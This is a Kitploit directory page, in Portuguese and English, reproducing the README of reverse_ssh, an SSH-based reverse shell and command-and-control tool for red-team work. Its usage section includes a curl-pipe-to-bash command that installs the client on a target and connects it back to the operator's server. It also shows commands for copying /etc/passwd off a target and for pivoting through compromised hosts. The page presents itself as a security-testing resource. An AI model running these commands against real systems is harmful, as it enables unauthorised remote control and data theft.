Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
reverse_ssh — Ferramenta de gerenciamento de shell reverso baseada em SSH com suporte nativo a SCP/SFTP, múltiplos protocolos de transporte, geração de DLL para Windows e execução sem arquivos para operações de red team. | Kitploit
Ferramentas/GitHubGitHub/nhas/reverse_ssh
ShellcodeGeração de Shellcode
GitHubnhas/reverse_ssh

reverse_ssh

Ferramenta de gerenciamento de shell reverso baseada em SSH com suporte nativo a SCP/SFTP, múltiplos protocolos de transporte, geração de DLL para Windows e execução sem arquivos para operações de red team.

Ver Repositório
1.4k18433há 22 diasRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Reverse SSH

icon
(Crédito da arte para https://www.instagram.com/smart.hedgehog.art/)

Quer usar SSH para reverse shells? Agora você pode.

  • Gerencie e conecte-se a reverse shells com sintaxe SSH nativa
  • Encaminhamento dinâmico, local e remoto
  • Implementações nativas de SCP e SFTP para recuperar arquivos de seus alvos
  • Shell completo do Windows
  • Múltiplos transportes de rede, como http, websockets, tls e mais
  • Autenticação mútua de cliente e servidor para criar canais de controle de alta confiança E mais!```text +----------------+ +---------+ | | | | | | +---------+ RSSH | | Reverse | | | Client | | SSH server | | | | | | | +---------+ +---------+ | | | | | | | | | Human | SSH | | SSH | +---------+ | Client +-------->+ <-----------------+ | | | | | | | RSSH | +---------+ | | | | Client | | | | | | | | | +---------+ | | | | | | +----------------+ | +---------+ | | | | | RSSH | +---------+ Client | | | +---------+
https://github.com/user-attachments/assets/11dc8d14-59f1-4bdd-9503-b70f8a0d2db1


- [Reverse SSH](#reverse-ssh)
  - [TL;DR](#tldr)
    - [Setup](#setup)
    - [Basic Usage](#basic-usage)
  - [Sponsors](#sponsors)
    - [Individuals](#individuals)
    - [Companies](#companies)
  - [Fancy Features](#fancy-features)
    - [Privileges](#privileges)
    - [Automatic connect-back](#automatic-connect-back)
    - [Reverse shell download (client generation and in-built HTTP server)](#reverse-shell-download-client-generation-and-in-built-http-server)
    - [Alternate Transports (HTTP/Websockets/TLS)](#alternate-transports-httpwebsocketstls)
    - [Bash autocomplete](#bash-autocomplete)
    - [Windows DLL Generation](#windows-dll-generation)
    - [SSH Subsystems](#ssh-subsystems)
      - [All](#all)
      - [Linux](#linux)
      - [Windows](#windows)
    - [Windows Service Integration](#windows-service-integration)
    - [Full Windows Shell Support](#full-windows-shell-support)
    - [Webhooks](#webhooks)
    - [Tun (VPN)](#tun-vpn)
    - [Fileless execution (Clients support dynamically downloading executables to execute as shell)](#fileless-execution-clients-support-dynamically-downloading-executables-to-execute-as-shell)
      - [Supported URI Schemes](#supported-uri-schemes)
- [Help](#help)
  - [Windows](#windows-help)
    - [SFTP](#windows-and-sftp)
    - [Session spawn errors (0xc0000142)](#session-spawn-errors-0xc0000142)
  - [Server started with `--insecure` still has `Failed to handshake`](#server-started-with---insecure-still-has-failed-to-handshake)
  - [Foreground vs Background](#foreground-vs-background)
- [Donations, Support, or Giving Back](#donations-support-or-giving-back)

## TL;DR

### Setup

A versão docker é recomendada, pois inclui a versão correta do golang e um cross compiler para Windows.```sh
# Start the server
docker run -p3232:2222 -e EXTERNAL_ADDRESS=<your.rssh.server.internal>:3232 -e SEED_AUTHORIZED_KEYS="$(cat ~/.ssh/id_ed25519.pub)" -v ./data:/data reversessh/reverse_ssh

ou docker compose:```yaml services: reversessh: image: reversessh/reverse_ssh ports: - "3232:2222" environment: - EXTERNAL_ADDRESS=<your.rssh.server.internal>:3232 - RSSH_CONSOLE_LABEL=c2.label - RSSH_LOG_LEVEL=INFO # DISABLED, INFO, WARNING, ERROR, FATAL - SEED_AUTHORIZED_KEYS=${SSH_PUBLIC_KEY} volumes: - ./data:/data

### Uso Básico```sh
# Connect to the server console
ssh your.rssh.server.internal -p 3232


# List all server console commands
catcher$ help

# Build a new client and host it on the in-built webserver
catcher$ link
http://192.168.0.11:3232/4bb55de4d50cc724afbf89cf46f17d25


# curl or wget this binary to a target system then execute it,
curl http://192.168.0.11:3232/4bb55de4d50cc724afbf89cf46f17d25.sh |  bash

# then we can then list what clients are connected
catcher$ ls
                                 Targets
+------------------------------------------+-----------------------------------+
| IDs                                      | Version                           |
+------------------------------------------+-----------------------------------+
| a0baa1631fe7cfbbfae34eb7a66d46c00d2a161e | SSH-v2.2.3-1-gdf5a3f8-linux_amd64 |
| fe6c52029e37185e4c7d512edd67a6c7694e2995 |                                   |
| dummy.machine                            |                                   |
| 192.168.0.11:34542                       |                                   |
+------------------------------------------+-----------------------------------+

Todos os comandos suportam a flag -h para exibir ajuda.

Em seguida, comandos ssh típicos funcionam, basta especificar seu servidor rssh como um host de salto.```sh

Connect to full shell

ssh -J your.rssh.server.internal:3232 dummy.machine

Start remote forward

ssh -R 1234:localhost:1234 -J your.rssh.server.internal:3232 dummy.machine

Start dynamic forward

ssh -D 9050 -J your.rssh.server.internal:3232 dummy.machine

SCP

scp -J your.rssh.server.internal:3232 dummy.machine:/etc/passwd .

## Patrocinadores

Um enorme obrigado às seguintes pessoas por doarem ao projeto RSSH e tornarem tudo isso possível!

### Indivíduos
[chikamobina](https://github.com/chikamobina) pelas suas generosas doações!  
[wrighterase (ctrlzero)](https://github.com/wrighterase) pelos seus pull requests e doação!

### Empresas

[Carapace](https://carapace.nz/) é uma consultoria de segurança baseada na Nova Zelândia com uma equipe extremamente talentosa!  
[<img src="https://assets.kitploit.com/production/public/readmes/5627/b077b138b5108d69a3bcb10eea9d5f195914c9fb4653689923b3a10a1ee38a64.png">](https://carapace.nz/)


## Recursos Avançados


### Privilégios
O servidor RSSH suporta privilégios de usuário muito básicos, onde usuários encontrados na pasta `data-directory`/`keys` (especificada por `--datadir`) e.g `data-directory/keys/jim` serão atribuídos como "usuário" apenas capazes de ver clientes que são públicos (encontrados no arquivo authorized_controllee_keys sem uma tag `owners`, ou com uma tag `owners` vazia) ou especificamente atribuídos a eles, e.g `owners="jim"`.

Isso pode ser alterado em tempo de execução por um usuário compartilhando acesso a um cliente que ele possui com o comando `access`, ou por um administrador do servidor. Por padrão, qualquer chave pública encontrada no arquivo `authorized_keys` será marcada como administrador para manter a compatibilidade reversa. Quaisquer alterações feitas pelo comando `access` não persistirão após a reinicialização do servidor, e isso exigirá a edição do arquivo `authorized_controllee_keys` para aquele cliente específico.

### Conexão automática reversa

O cliente rssh permite que você integre um endereço de conexão reversa. Por padrão, o comando `link` irá integrar o endereço externo do servidor.
Baixar ferramenta